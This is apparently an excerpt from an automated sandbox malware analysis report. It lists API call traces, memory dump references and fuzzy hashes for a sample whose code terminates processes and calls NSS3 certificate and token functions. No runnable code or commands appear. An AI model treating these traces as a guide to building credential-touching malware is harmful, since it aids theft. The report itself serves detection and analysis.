                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1631AEB1A002169FEB08CF65CC91ABFBBF9EF95248B50442DD905E7710EB31D915CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415BEB
                                                                                                                                                                                                                                • Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                • Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                • Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415CD6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 396451647-0
                                                                                                                                                                                                                              • Opcode ID: d3994fdeab40983a441a68097a461e1d21d833049bc6d2065065ec80ed2014dd
                                                                                                                                                                                                                              • Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3994fdeab40983a441a68097a461e1d21d833049bc6d2065065ec80ed2014dd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C955DEF,?,?,?), ref: 6C956456
                                                                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C955DEF,?,?,?), ref: 6C956476
                                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C955DEF,?,?,?), ref: 6C9564A0
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C955DEF,?,?,?), ref: 6C9564C2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CertificateError$DestroyTemp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3886907618-0
                                                                                                                                                                                                                              • Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                                                                                                                                                              • Instruction ID: 6712a58c092791c7e24f9b2527591ecb13d2c3dc258261cb8120c933ec0bb400
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4221E7B1A002016BFB20DF28DC45BA376EDEB50318F944538F91AC6B51E7B2D568C791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000008,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A459B
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A45BF
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A45D3
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C9A473B,00000000,?,6C997A4F,?), ref: 6C9A45E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2963671366-0
                                                                                                                                                                                                                              • Opcode ID: ab465facdf5eaf45c795dce11a411af854bc29b7d3c7ada8834f51d737b4681b
                                                                                                                                                                                                                              • Instruction ID: 323806f5412da8918090851f9f455754c73a2076cac0596d3f5becc821b44744
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab465facdf5eaf45c795dce11a411af854bc29b7d3c7ada8834f51d737b4681b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B521F5B0E00207AFDB049FA9DC045AABBB8FF19319F008539D848D7B20EB31E556CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 6C9404F1
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C94053B
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C940558
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C94057A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3051374878-0
                                                                                                                                                                                                                              • Opcode ID: cf64a179d15e1c4615cb14f5b8bee22c771318ddd6d5a04219ce5541816a5296
                                                                                                                                                                                                                              • Instruction ID: e72f6dd06a30c3aec160e3bd8b90284d11850ab3d3db29d7018f14e40fb7b82a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf64a179d15e1c4615cb14f5b8bee22c771318ddd6d5a04219ce5541816a5296
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD216571A002199FDB08DF99DC94A9EB7B8FF48318B108169E809DB351D735ED06CBD0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6C97ACC2
                                                                                                                                                                                                                                • Part of subcall function 6C952F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C952F0A
                                                                                                                                                                                                                                • Part of subcall function 6C952F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C952F1D
                                                                                                                                                                                                                                • Part of subcall function 6C952AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C950A1B,00000000), ref: 6C952AF0
                                                                                                                                                                                                                                • Part of subcall function 6C952AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C952B11
                                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6C97AD5E
                                                                                                                                                                                                                                • Part of subcall function 6C9957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C95B41E,00000000,00000000,?,00000000,?,6C95B41E,00000000,00000000,00000001,?), ref: 6C9957E0
                                                                                                                                                                                                                                • Part of subcall function 6C9957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C995843
                                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(?), ref: 6C97AD36
                                                                                                                                                                                                                                • Part of subcall function 6C952F50: CERT_DestroyCertificate.NSS3(?), ref: 6C952F65
                                                                                                                                                                                                                                • Part of subcall function 6C952F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C952F83
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C97AD4F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 132756963-0
                                                                                                                                                                                                                              • Opcode ID: 5882ff84e09542155d21a842b946bc8a82cfedec18c8c3b5404cfc060307ca81
                                                                                                                                                                                                                              • Instruction ID: 3ab1e74c994c762f6facd665ca85600758d5c3d2594ff3ffbf60dd2e889b1bce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5882ff84e09542155d21a842b946bc8a82cfedec18c8c3b5404cfc060307ca81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E21C6B1D012058BEB20DFA4E9055EE77B4AF15248F455168D8057B700FB31EA69CBB1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C9924FF
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C99250F
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C99253C
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C992554
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                                                                                                              • Opcode ID: d25db421ebcf5973582eabdac1f3ec8d08c547401c57a086fca624da137d3ec8
                                                                                                                                                                                                                              • Instruction ID: 542cfe7191c1e741e39d570217d01700996d2b0528fc94925f98fd6604b19371
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d25db421ebcf5973582eabdac1f3ec8d08c547401c57a086fca624da137d3ec8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5511E97190020A6BDB00AF68EC459BF7B7CEF19228B458124ED0997711E731E955C7E2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C9AF0AD,6C9AF150,?,6C9AF150,?,?,?), ref: 6C9AECBA
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C9AECD1
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C9AED02
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B116E
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C9AED5A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2957673229-0
                                                                                                                                                                                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                              • Instruction ID: 07d92754c4575f3636753ee24cd719d238ac1781712cd8709813b0646f2478e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8221A1B1A00742ABE700CF25D944B52B7E4BFA5348F25C219E81C97A61FB70E5A5C6D0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEDD4
                                                                                                                                                                                                                              • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEDFD
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEE14
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,6C9C9767,00000000,00000000,6C9C7FFA,?,6C9C9767,?,8B7874C0,0000A48E), ref: 6C9DEE33
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3903481028-0
                                                                                                                                                                                                                              • Opcode ID: 95f0d0b5b3f591f348ad781117b8b7fefd0381b2ce4e9c47e6a596e09a2811ff
                                                                                                                                                                                                                              • Instruction ID: 3e6bd49ff5cb9b40c8b43c836203f7f1d8f572aab199a1b90219098ae75cdbeb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95f0d0b5b3f591f348ad781117b8b7fefd0381b2ce4e9c47e6a596e09a2811ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA11C2B1A00B07ABEB109EA5DC84B56F3ACEF1035DF228531E919A2A00E731F464C7F1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                                                                                                              • Opcode ID: 188dfca3ecd4e80e4db713ee868aacf23d6be5f1c8e4ea7f2e0845bb0644c515
                                                                                                                                                                                                                              • Instruction ID: a46d2c44993041fd36a023cbfa43823352badbede3dd180b8fa72ce7bae09f5d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 188dfca3ecd4e80e4db713ee868aacf23d6be5f1c8e4ea7f2e0845bb0644c515
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4118C71605A029BD704BF78D4882AABBF4FF15354F018929DC98D7B00E734E895CBD6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C9E5F17,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FAC94
                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C9E5F17,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FACA6
                                                                                                                                                                                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FACC0
                                                                                                                                                                                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C9EAAD4), ref: 6C9FACDB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3989322779-0
                                                                                                                                                                                                                              • Opcode ID: f241da6fb0eaf39484bae1ace215f425619a694510306a368843cfa261ded514
                                                                                                                                                                                                                              • Instruction ID: 398a21d83b5987362369ec90abd770abf6cccb6f538e1f1bfbdec07177c6a5bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f241da6fb0eaf39484bae1ace215f425619a694510306a368843cfa261ded514
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED019EB1701B029BE710DF69E908757B7E8BF00669B004839D86AC3E00EB36F016CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
